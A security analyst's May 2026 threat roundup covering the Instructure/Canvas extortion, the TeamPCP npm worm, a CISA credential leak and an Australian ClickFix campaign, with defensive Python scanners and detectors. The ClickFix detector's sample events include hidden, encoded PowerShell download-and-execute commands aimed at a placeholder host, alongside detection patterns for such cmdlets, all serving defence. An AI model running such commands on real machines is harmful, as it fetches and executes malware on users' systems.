Allan Grant | SOC Analyst | 1 June 2026
Three themes defined May.
The npm ecosystem suffered its most significant supply chain compromise to date, with the TeamPCP collective demonstrating that signed, provenance-verified packages can no longer be trusted at face value. ShinyHunters returned with a sustained extortion campaign against Instructure that exposed personal data belonging to roughly 275 million students and staff worldwide, including a significant Australian contingent. And CISA formally moved US critical infrastructure policy onto a wartime footing with its CI Fortify initiative, openly acknowledging that the assumption of prevention has been replaced by the assumption of compromise.
It was another busy month for Australian ransomware victims, spanning hospitality, jewellery, home construction and IT services. May also saw the formal establishment of Australia's Cyber Incident Review Board, and an active ClickFix campaign abusing compromised Australian WordPress sites to deploy infostealers.
On 5 May, the US Cybersecurity and Infrastructure Security Agency (CISA) released CI Fortify, new guidance designed to help critical infrastructure entities continue operating through a crisis or active conflict rather than simply trying to prevent compromise in the first place. (CISA) The initiative is built around three pillars: isolation, proactively disconnecting from third-party and business networks so that cyber impacts cannot cascade into operational technology; sustainment, running essential services in degraded mode; and recovery, documenting systems, backing up critical files, and rehearsing manual fallback procedures. (AHA)
US policy is now explicitly oriented around the assumption of cyber-during-kinetic conflict, not just peacetime defence. The guidance is modelled on advice the Australian government published in 2025 and arrives as US intelligence agencies continue to warn that China may sabotage Western critical infrastructure to slow allied responses to any move on Taiwan. "Operate degraded" has replaced "prevent breach" as the working assumption, which reflects the reality that Volt Typhoon-class actors are already pre-positioned inside many of these environments. The vocabulary - isolate, sustain, recover - is military continuity-of-operations doctrine applied to the private sector.
CISA is doing this short-staffed, having lost roughly a third of its workforce and several key collaboration tools in recent cuts. (Cybersecurity Dive) CI Fortify is, in part, a force-multiplier strategy: rather than expanding agency service delivery, it pushes self-reliance onto operators. For Australian critical infrastructure entities, the guidance is worth reading alongside existing Australian Signals Directorate (ASD) material, since the underlying premise is that you will be attacked and need to keep operating, which is the same one Australian regulators have been pointing at for several years.
A contractor working for CISA itself, employed by Dulles, Virginia-based Nightwing, left a public GitHub repository named "Private-CISA" online, leaking credentials for several AWS GovCloud accounts and numerous internal CISA systems. The exposure was discovered by Guillaume Valadon of GitGuardian, whose automated scanners detected the secrets; when the repository owner did not respond to his outreach, he contacted KrebsOnSecurity.
The repository contained plaintext passwords stored in CSV files (with names like importantAWStokens and AWS-Workspace-Firefox-Passwords.csv), cloud keys, tokens, logs, and access to internal resources including the Landing Zone DevSecOps environment and CISA's internal Artifactory code repository, the latter described by researcher Philippe Caturegli of Seralys as a prime target for supply chain backdoors and lateral movement. The contractor had deliberately disabled GitHub's built-in secret detection feature, used weak passwords (often just the platform name plus the current year), and appears to have used the repository as a personal sync mechanism between work and home devices. The repository had been active since 13 November 2025, and although the account was taken offline once CISA was notified, the exposed AWS keys remained valid for another 48 hours.
CISA has stated there is currently no indication that sensitive data was compromised, but the incident raises serious questions about contractor oversight, especially given the agency's recent workforce reductions. The lesson to be taken from this is that secret-scanning is a baseline control, not an optional one, and a contractor's "personal sync repo" should never be a route to production federal cloud credentials. (KrebsOnSecurity)
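As an added illustration of that baseline control (example code written for this page, not GitGuardian's or GitHub's scanner), the following Python scans a set of files for the two things the Nightwing repository exposed: AWS key material, and platform-plus-year passwords sitting in CSV exports. The file names echo the incident, but every file body is constructed, and the AWS values are AWS's own published example credentials, not live keys.

```python
"""Minimal secret and weak-password scanner. Added example, not the scanner
used in the incident; the sample repository below is constructed."""
import re
from dataclasses import dataclass

# AWS access key IDs: a 4-char prefix (AKIA long-term, ASIA temporary) followed
# by 16 upper-case alphanumerics. This is AWS's documented format.
AWS_ACCESS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")
# AWS secret access keys are 40 base64-alphabet characters. On their own they are
# noisy, so one is only reported in a file that also contains an access key ID.
AWS_SECRET_KEY_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")
# GitHub classic personal access tokens: ghp_ plus 36 alphanumerics.
GITHUB_PAT_RE = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")
# "Platform name plus current year" passwords such as Artifactory2025!; a trailing
# symbol or two does not rescue them.
WEAK_PASSWORD_RE = re.compile(r"^[A-Za-z]{3,20}20[2-3]\d[!@#$%^&*]{0,2}$")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str
    sample: str  # redacted, so the report itself does not re-leak the secret


def redact(value: str) -> str:
    """Keep 4 chars either side so the owner can recognise which key it is."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(path: str, text: str) -> list[Finding]:
    findings: list[Finding] = []
    saw_access_key = False
    is_csv = path.lower().endswith(".csv")
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in AWS_ACCESS_KEY_RE.finditer(line):
            saw_access_key = True
            findings.append(Finding(path, lineno, "aws_access_key_id", redact(m.group())))
        for m in GITHUB_PAT_RE.finditer(line):
            findings.append(Finding(path, lineno, "github_pat", redact(m.group())))
        if saw_access_key:
            for m in AWS_SECRET_KEY_RE.finditer(line):
                findings.append(Finding(path, lineno, "aws_secret_access_key", redact(m.group())))
        if is_csv:  # password exports: treat every cell as a candidate password
            for cell in line.split(","):
                cell = cell.strip().strip('"')
                if WEAK_PASSWORD_RE.match(cell):
                    findings.append(Finding(path, lineno, "weak_password", redact(cell)))
    return findings


def scan_repository(files: dict[str, str]) -> list[Finding]:
    return [f for path, text in files.items() for f in scan_text(path, text)]


def finding_kinds(findings: list[Finding]) -> list[str]:
    return sorted({f.kind for f in findings})


# Constructed sample repository. The AWS values are AWS's documented example
# credentials (AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY), not real keys.
SAMPLE_REPO = {
    "importantAWStokens": (
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "AWS-Workspace-Firefox-Passwords.csv": (
        "site,username,password\n"
        "artifactory.example,jdoe,Artifactory2025!\n"
        "mail.example,jdoe,Tr0ub4dor&3-xk9\n"
    ),
    "README.md": "Sync notes only.\n",
}

if __name__ == "__main__":
    for f in scan_repository(SAMPLE_REPO):
        print(f"{f.path}:{f.line} {f.kind} {f.sample}")
```

Run as a pre-commit hook this blocks the commit on any finding; the point is that a scanner this simple, let alone the one GitHub ships, would have flagged both files on the first push.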
ShinyHunters has been a dominant presence in recent months and continued into May with a sustained extortion campaign against Instructure, the US-based company behind the Canvas learning management system. The events unfolded over roughly two weeks and ended with what, according to several news outlets, appears to have been a paid ransom.
The initial breach was disclosed on 25 April, with Instructure's CISO Steve Proud announcing on 2 May that the incident had been contained through patching and key rotation. (DarkReading) Within hours, fresh ransom splash pages reappeared on student accounts, and further defacements continued to surface as late as 7 May. Attackers had exploited an undisclosed vulnerability in Canvas's "Free-For-Teacher" feature, forcing Instructure to take that service offline, and Canvas itself offline for periods, during the response.
ShinyHunters claimed exfiltration of approximately 3.65 TB of data including names, email addresses, student IDs, and what the group described as "several billions of private messages", affecting roughly 275 million individuals across nearly 9,000 institutions. Canvas holds approximately 47% of the North American higher education LMS market and 28% of K-12, so the blast radius spans schools, healthcare organisations, government entities, and large corporates including Amazon and Apple. Most significantly, much of the exposed personal information belongs to minors, which unlike passwords or card numbers cannot be rotated and creates lifelong identity fraud and social engineering risk.
After a week of outages and a public extortion deadline of 12 May, Instructure announced it had "reached an agreement" with ShinyHunters. (TheGuardian, ITPro) The company has not confirmed a ransom was paid, but the language has been widely read as a thinly veiled confirmation, with the demand reportedly set at US$10 million. Instructure says the data has been "returned" and that it received "digital confirmation of data destruction" via shred logs.
The incident reignites the ransomware payment debate. Governments in Australia, the UK and the US continue to advise against payment, yet McGrathNicol's November 2025 survey of 800 Australian executives found that 64% had paid and 81% said they would, with an average payment of $711,000. Experts including McGrathNicol's Darren Hopkins and Aegis Cybersecurity's Luke Irwin make the obvious point that while ShinyHunters has a business-model incentive to appear "honest" to future victims, a screenshot of a deletion log proves nothing about whether copies were retained, sold, or quietly reused. Instructure and its customers are now trusting a criminal organisation entirely on its word.
Australian organisations confirmed as affected or investigating include the University of Technology Sydney, the University of Sydney, the University of Melbourne, RMIT, Flinders University, and TasTAFE. TasTAFE has confirmed that some personal information including stored Canvas messages was accessed, although passwords, dates of birth, government IDs, and financial data appear unaffected. (Cyber Daily)
Queensland Education Minister John-Paul Langbroek has separately confirmed that staff and students of Education Queensland schools were caught up in the breach, with names, email addresses, and school locations exposed. The state has run its QLearn platform on Canvas since 2020, and records dating back to that point were exposed. School principals are notifying affected families, with targeted support being provided to households flagged for family and domestic violence concerns, an important detail given how readily school location data can be weaponised in those situations. (ABC News)
Over eight days, a threat group calling itself TeamPCP ran two waves of its Mini Shai-Hulud worm through the npm registry, compromising hundreds of packages from TanStack, Mistral AI, UiPath, and Alibaba's AntV, and demonstrating that the cryptographic guarantees the open source world has spent years building can be bypassed by hijacking the pipelines that produce them.
The TanStack incident on 11 May was the headline event. The scale was significant: 84 malicious versions across 42 packages, including the @tanstack/react-router library with 12 million weekly downloads. But the method is what makes this strategically important.
No npm token was stolen. No maintainer was phished. Instead, attackers hijacked TanStack's own GitHub Actions release pipeline through a misconfigured pull_request_target workflow, poisoned the build cache, and waited for a legitimate maintainer to merge to main. When the real release ran, malicious code extracted the publishing token from runner memory and pushed the malware using TanStack's trusted identity. Every malicious package shipped with valid Supply-chain Levels for Software Artifacts (SLSA) Build Level 3 provenance, a first in npm's history, and a development that effectively retires "just check the signature" as a defensive strategy on its own. (TanStack) (GitHub) (Wiz)
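The misconfiguration in question, shown as an added example rather than TanStack's actual workflow: a text-based audit that flags pull_request_target workflows which check out the pull request head, execute it (install scripts and build steps run with the base repository's secrets), and write to the Actions cache that a later trusted release run may restore. The three workflow bodies are constructed and the heuristics are mine; a YAML-aware tool would be more precise, but this runs with nothing beyond the standard library.

```python
"""Heuristic audit for the pull_request_target pattern. Added example; not
TanStack's workflow and not a GitHub tool. Text-based on purpose (no YAML
parser), so hits are leads to review, not proof. Multi-line `run: |` scripts
are not inspected by this version."""
import re

TRIGGER_RE = re.compile(r"\bpull_request_target\b")
# actions/checkout pointed at the PR head or merge ref rather than the base branch
UNTRUSTED_REF_RE = re.compile(
    r"github\.event\.pull_request\.head\.(?:sha|ref)|refs/pull/[^\s\"']+/(?:head|merge)"
)
# Single-line run: steps that execute repository content (package.json install
# scripts, Makefiles, checked-in scripts)
EXEC_RE = re.compile(
    r"^\s*-?\s*run:.*(?:\b(?:npm\s+(?:ci|i|install)|pnpm\s+(?:i|install)|yarn|"
    r"bun\s+install|pip\s+install|make)\b|\./)",
    re.M,
)
# Cache writes. Under pull_request_target the run's ref is the base branch, so a
# PR-controlled cache entry lands in the base branch's cache scope.
CACHE_WRITE_RE = re.compile(r"uses:\s*actions/cache(?:/save)?@")


def audit_workflow(text: str) -> list[str]:
    """Findings for one workflow file; an empty list means nothing flagged."""
    if not TRIGGER_RE.search(text):
        return []  # plain pull_request runs from forks get no secrets and a read-only token
    checks_out_pr = bool(UNTRUSTED_REF_RE.search(text))
    runs_code = bool(EXEC_RE.search(text))
    writes_cache = bool(CACHE_WRITE_RE.search(text))
    issues = []
    if checks_out_pr and runs_code:
        issues.append("critical: pull_request_target checks out the PR head and runs it with repository secrets")
    elif checks_out_pr:
        issues.append("high: pull_request_target checks out the PR head; any step that executes it runs with secrets")
    if checks_out_pr and writes_cache:
        issues.append("high: PR-controlled run writes to actions/cache in the base branch scope (cache poisoning)")
    if not checks_out_pr:
        issues.append("info: pull_request_target without PR checkout; confirm no run: step interpolates PR-controlled fields")
    return issues


def audit_all(workflows: dict[str, str]) -> dict[str, list[str]]:
    return {name: audit_workflow(text) for name, text in workflows.items()}


# Constructed workflows: the vulnerable shape, a hardened equivalent, and a
# legitimate pull_request_target use that never touches PR code.
SAMPLE_WORKFLOWS = {
    "ci.yml (vulnerable)": """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/cache@v4
        with:
          path: node_modules
          key: deps-${{ hashFiles('**/package-lock.json') }}
      - run: npm ci
      - run: npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
""",
    "ci.yml (hardened)": """\
name: ci
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts
      - run: npm test
""",
    "labeler.yml": """\
name: label
on:
  pull_request_target:
permissions:
  pull-requests: write
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
""",
}

if __name__ == "__main__":
    for name, issues in audit_all(SAMPLE_WORKFLOWS).items():
        print(name, issues or ["ok"])
```

The hardened variant is the usual fix: trigger on pull_request (no secrets, read-only token for fork PRs) and run installs with --ignore-scripts; where pull_request_target is genuinely needed (labelling, commenting), never check out the PR and never write a cache from that run.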
Within hours, the worm self-propagated to more than 170 packages. OpenAI, which was affected by this campaign, subsequently disclosed that two employee devices had been compromised in the incident, resulting in stolen credentials and limited access to internal source code repositories including code-signing certificates for its iOS, macOS, Windows, and Android apps. (Security Affairs) (BleepingComputer) OpenAI has rotated credentials, revoked certificates, and re-signed affected software, warning macOS users specifically to update their OpenAI apps before 12 June 2026. Grafana separately received a ransom demand after its repositories were exfiltrated.
Eight days later, on 19 May, TeamPCP returned through a compromised npm maintainer account and pushed 637 malicious versions across 323 packages in Alibaba's AntV ecosystem in a 22-minute automated burst, totalling roughly 16 million combined weekly downloads. (StepSecurity) Two distinct delivery methods, the same worm, eight days apart. This is an active and adaptive campaign, not a series of isolated incidents.
The trust model underpinning modern software (pin a version, verify the signature, trust the provenance, install) was built on the assumption that the pipeline producing those signatures is itself trustworthy. TeamPCP has now disproven that assumption twice in a single month, and the playbook is public for other groups to copy.
Immediate recommendations for organisations: treat CI/CD runners as production infrastructure, with the access controls and monitoring that implies; implement 24 to 72 hour release cooldowns, which would have kept both May waves out of builds before they spread; audit pull_request_target workflows organisation-wide; and be able to answer in minutes (not days) whether you are currently running any compromised versions. Copy-cat campaigns are already emerging, and the downstream effects could be felt for months to come, with new reports every week.
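Two of those recommendations, the "are we running a compromised version?" question and the release cooldown, as an added worked example in Python (not tooling from TanStack, AntV or any affected project). The lockfile, the list of bad versions, the registry publish times and the clock are all constructed stand-ins so the example is deterministic and runs offline; in practice the bad-version list comes from the vendor advisories and the publish times from the registry packument's "time" field.

```python
"""Compromised-version check and release cooldown over a package-lock.json.
Added example; every input below is constructed."""
from __future__ import annotations

import json
from datetime import datetime, timedelta, timezone

# Constructed stand-in for an advisory's list of malicious versions.
COMPROMISED_VERSIONS: dict[str, set[str]] = {
    "@example/router": {"1.2.3", "1.2.4"},
    "@example/charts": {"5.0.1"},
}

# Constructed package-lock.json in the lockfileVersion 2/3 "packages" shape.
LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.1.0"},
        "node_modules/@example/router": {"version": "1.2.3"},
        "node_modules/@example/charts": {"version": "4.9.0"},
        "node_modules/@example/charts/node_modules/left-pad": {"version": "1.3.0"},
    },
})

# Constructed excerpt of each package's registry "time" field (version -> publish time).
REGISTRY_TIME: dict[str, dict[str, str]] = {
    "@example/router": {"1.2.3": "2026-05-11T09:40:00Z"},
    "@example/charts": {"4.9.0": "2026-02-01T00:00:00Z"},
    "left-pad": {"1.3.0": "2018-03-02T00:00:00Z"},
}

# Fixed clock for the example; real use is datetime.now(timezone.utc).
NOW = datetime(2026, 5, 12, tzinfo=timezone.utc)


def installed_packages(lock_text: str) -> set[tuple[str, str]]:
    """All (name, version) pairs in the lockfile, nested installs included."""
    lock = json.loads(lock_text)
    installed = set()
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        # Nested installs look like node_modules/a/node_modules/b; the text after
        # the last node_modules/ is the package name and keeps any @scope prefix.
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        installed.add((name, meta["version"]))
    return installed


def find_compromised(installed: set[tuple[str, str]]) -> list[tuple[str, str]]:
    return sorted((n, v) for n, v in installed if v in COMPROMISED_VERSIONS.get(n, set()))


def _publish_time(name: str, version: str) -> datetime | None:
    ts = REGISTRY_TIME.get(name, {}).get(version)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")) if ts else None


def cooldown_violations(installed, now=NOW, min_age=timedelta(hours=72)):
    """Versions younger than min_age at `now`. A version the registry cannot
    date is reported as well rather than trusted silently."""
    out = []
    for name, version in sorted(installed):
        published = _publish_time(name, version)
        if published is None:
            out.append((name, version, "no publish time"))
        elif now - published < min_age:
            out.append((name, version, f"published {now - published} ago"))
    return out


def check(lock_text: str = LOCKFILE, now: datetime = NOW) -> dict:
    installed = installed_packages(lock_text)
    return {"compromised": find_compromised(installed),
            "cooldown": cooldown_violations(installed, now)}


if __name__ == "__main__":
    print(json.dumps(check(), indent=2, default=str))
```

Both checks run in seconds against a real lockfile, which is what "answer in minutes" requires; the cooldown belongs in CI as a hard gate, not in a human review step.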
Australia's Federal Budget of 2026–27 is notably quiet on cyber security. Treasurer Jim Chalmers made no direct mention of it in his speech, with only scattered references buried across the budget papers. (Budget.gov.au) (Cyber Daily)
Key allocations include a $2.2 billion investment in Services Australia with $160.4 million over four years specifically for cyber security uplift at service centres and Communications and Information Technology (CIT) systems, $33.7 million for ICT governance including cyber capacity at the Aged Care Quality and Safety Commission, and $89.3 million over four years from 2026–27 to sustain Horizon 2 of the 2023 to 2030 Australian Cyber Security Strategy, partially funded from existing Home Affairs resources. The defence function will consume 6.2% of total expenses, covering the cyber domain alongside traditional military operations.
Australia has formally established a Cyber Incident Review Board under the Cyber Security Act 2024, as part of the 2023–2030 Cyber Security Strategy. (Industrial Cyber) The board will conduct no-fault post-incident reviews of major cyber events to extract actionable lessons and strengthen national resilience.
It will be chaired by Narelle Devine, Global CISO at Telstra, supported by six senior members drawn from industry, academia, and critical infrastructure. The board will only engage after an incident is fully resolved and is empowered to examine either single events or clusters of related attacks. Its work is backed by an Expert Panel whose members must hold at least a Secret-level security clearance. The model draws explicitly on the now-defunct US Cyber Safety Review Board, and represents a shift toward systematic, continuous learning from cyber incidents.
The board's value will depend on whether organisations cooperate substantively with reviews, which in turn depends on whether participation is seen as a constructive process rather than a precursor to enforcement.
Australia and Japan are tightening their cyber and C4 defence partnership, with senior military leaders meeting in Canberra to advance secure communications and network interoperability. Building on more than a decade of ICT cooperation since 2014, both nations are aligning priorities across warfighting and enterprise systems, ensuring their forces can operate seamlessly in contested, high-threat environments across the Indo-Pacific. (Defence)
May was another busy month domestically, with ransomware groups continuing to find targets across hospitality, education, construction, retail, and IT services.
The Australian Signals Directorate's (ASD) Australian Cyber Security Centre (ACSC) published an advisory on 7 May flagging an active campaign hitting Australian organisations. Attackers are compromising the WordPress sites of legitimate Australian businesses to deliver Vidar Stealer to Windows machines using the ClickFix social engineering technique.
The attack chain works as follows. The compromised WordPress site loads malicious JavaScript that overwrites the page with a fake Cloudflare "Verify you are human" CAPTCHA. Clicking the checkbox silently copies an obfuscated PowerShell command to the clipboard, and a pop-up instructs the user to paste and run it as administrator. The PowerShell command pulls down Vidar, which self-deletes from disk and runs in memory. Vidar then fetches its command-and-control configuration from dead-drop resolvers such as Telegram bots and Steam profiles, and exfiltrates credentials, browser data, cryptocurrency wallets, and system information over HTTP/S POST.
The campaign is effective because it exploits trust in legitimate Australian websites, sidesteps endpoint controls by getting the user to run admin commands voluntarily, complicates forensics through fileless execution, and resists takedown by using Telegram and Steam profiles for C2 resolution.
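Detection logic for that chain, as an added example (not an ACSC rule), run over constructed Sysmon-style process-creation events. It decodes any -EncodedCommand blob so the indicators are checked against what PowerShell will actually run, then scores the signals the chain leaves behind: PowerShell launched by the user from explorer.exe (the Run dialog), a hidden window, profile and execution-policy suppression, download-and-execute cmdlets, and elevation. The field names follow Sysmon Event ID 1; the events themselves are constructed, with the encoded payload built in the block so the decoder path is exercised.

```python
"""ClickFix / PowerShell download-and-execute detection over constructed
process-creation events (Sysmon Event ID 1 fields, one JSON object per line).
Added example; not an ASD/ACSC rule."""
import base64
import json
import re


def ps_encode(command: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Any prefix PowerShell accepts for -EncodedCommand (-e, -ec, -enc, ...) then the blob.
ENCODED_RE = re.compile(r"(?i)(?<!\S)[-/](?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{20,})")
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+(?:hidden|1)\b"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "policy_bypass": re.compile(r"(?i)-(?:ep|ex[a-z]*)\s+bypass\b"),
    "download_exec": re.compile(
        r"(?i)\b(?:iex|irm|iwr|invoke-expression|invoke-restmethod|invoke-webrequest)\b"
        r"|downloadstring|downloadfile"
    ),
}
USER_SHELL_PARENTS = ("\\explorer.exe",)  # Win+R / Run dialog launches land here
SHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")


def effective_command(cmdline: str) -> str:
    """Command line plus the decoded -EncodedCommand payload, if there is one."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not a real blob
        return cmdline
    return cmdline + "\n" + decoded


def score_event(ev: dict) -> tuple[int, list[str]]:
    if not ev.get("Image", "").lower().endswith(SHELL_IMAGES):
        return 0, []
    raw = ev.get("CommandLine", "")
    cmd = effective_command(raw)
    reasons = []
    if ev.get("ParentImage", "").lower().endswith(USER_SHELL_PARENTS):
        reasons.append("user_launched")
    if ENCODED_RE.search(raw):
        reasons.append("encoded_command")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if ev.get("IntegrityLevel", "").lower() == "high":
        reasons.append("elevated")
    return len(reasons), reasons


def detect(events: list[dict], threshold: int = 3) -> list[dict]:
    """Alert only when download-and-execute is present and at least `threshold`
    signals agree; a lone iwr in an admin's script is not enough."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if "download_exec" in reasons and score >= threshold:
            alerts.append({"id": ev["id"], "score": score, "reasons": reasons})
    return alerts


def detect_log(jsonl: str, threshold: int = 3) -> list[dict]:
    return detect([json.loads(l) for l in jsonl.splitlines() if l.strip()], threshold)


# Constructed events: 1 and 4 are ClickFix-shaped, 2 is a scheduled admin script,
# 3 is an interactive shell, 5 is not PowerShell at all.
PS51 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "Image": PS51, "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "High",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc "
                    + ps_encode("iex (irm https://example.invalid/verify)")},
    {"id": 2, "Image": PS51, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "IntegrityLevel": "High",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"id": 3, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "IntegrityLevel": "Medium",
     "ParentImage": "C:\\Program Files\\WindowsApps\\WindowsTerminal.exe", "CommandLine": "pwsh.exe -NoLogo"},
    {"id": 4, "Image": PS51, "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell -w 1 -c \"iex (iwr -useb http://example.invalid/c)\""},
    {"id": 5, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "Medium", "CommandLine": "chrome.exe --type=renderer"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for alert in detect_log(SAMPLE_LOG):
        print(json.dumps(alert))
```

The explorer.exe parent is the part worth keeping even if the rest is tuned down: almost nothing legitimate in an enterprise runs a hidden, profile-less PowerShell one-liner from the Run dialog, and that is exactly the shape a pasted ClickFix command takes.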
Priority mitigations include application control to block unauthorised scripts and executables initiated from browser activity; PowerShell hardening (script code signing, constrained language mode, and blocking outbound network calls from PowerShell); enforcing least privilege so standard users do not hold administrative rights; phishing-resistant MFA on administrative, remote access, and cloud accounts; protective Domain Name System (DNS) to block known malicious domains and C2 infrastructure; patching WordPress core, plugins, and themes; and user awareness training. The simple takeaway is that if a CAPTCHA tells you to open PowerShell, it is malware. (cyber.gov.au)
The events of May demonstrate threat actors are working through trust relationships. TanStack and AntV came in through CI/CD pipelines, Instructure through a platform feature flaw, the CISA leak through a contractor's personal repo, and Vidar through legitimate Australian WordPress sites.
Key takeaways for organisations: